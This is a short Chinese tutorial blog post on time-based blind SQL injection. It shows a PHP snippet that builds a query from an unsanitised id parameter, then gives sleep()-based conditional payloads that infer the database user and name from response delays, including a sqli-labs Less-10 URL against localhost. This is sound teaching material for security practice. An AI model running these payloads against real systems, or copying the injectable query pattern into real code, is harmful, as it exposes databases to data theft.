登录注册写文章

时间盲注

时间盲注

时间盲注原理：

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row=mysql_fetch_array($result);
if($row)
{
  echo "";
}
else
{
   echo "";
}

代码存在sql注入漏洞，然而页面既不会回显数据，也不会回显错误信息
语句执行后也不提示真假，我们不能通过页面的内容来判断
这里我们可以通过构造语句，通过页面响应的时长，来判断信息，这既是时间盲注

时间盲注方法：

构造逻辑语句，通过条件语句进行判断，为真就立即执行，否则延时执行
核心语法：
if(left(user(),1)='a',0,sleep(3));
真实场景：
if(ascii(substr(database(),1,1)>115,0,sleep(5))%23
sqli-labs10：
http://127.0.0.1/Less-10/?id=1" and if(left(user(),1)='a',0,sleep(3))--+

©著作权归作者所有,转载或内容合作请联系作者
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

推荐阅读更多精彩内容

易通SQL时间盲注复现
易通CMS是一个企业网站建站系统，本期带来其3.X.X版本中，前台SQL注入和后台文件上传的漏洞复现过程。基础环...
漏斗社区阅读 1,254评论 0赞 0
时间盲注
sleep注入获取库名 and sleep(if(ascii(substr(database(),1,1))<1...
陈望_ning阅读 801评论 0赞 1
[sqli-labs]Less-1(明注 , Bool盲注 , 时间盲注 , 报错注入)
打开主页进入第一关 : 提示传入id这个参数发现这个页面会根据传入的ID查询到对应的用户这里我们可以通过查看数据...
王一航阅读 1,076评论 1赞 6
[sqli-labs]Less-10(时间盲注 , 宽字节注入 , Bool盲注)
和第九题一样 , 将单引号换成双引号就好了后记 :之后写了一个批量检测Bool盲注的脚本 :跑了之后发现竟然还有...
王一航阅读 751评论 1赞 0
时间盲注
ctf练习平台的web15 看代码知道没有注入的回显，所以想到使用时间盲注。select case when......
早安夏天_afa3阅读 289评论 0赞 0

赞1赞

赞赏

手机看全文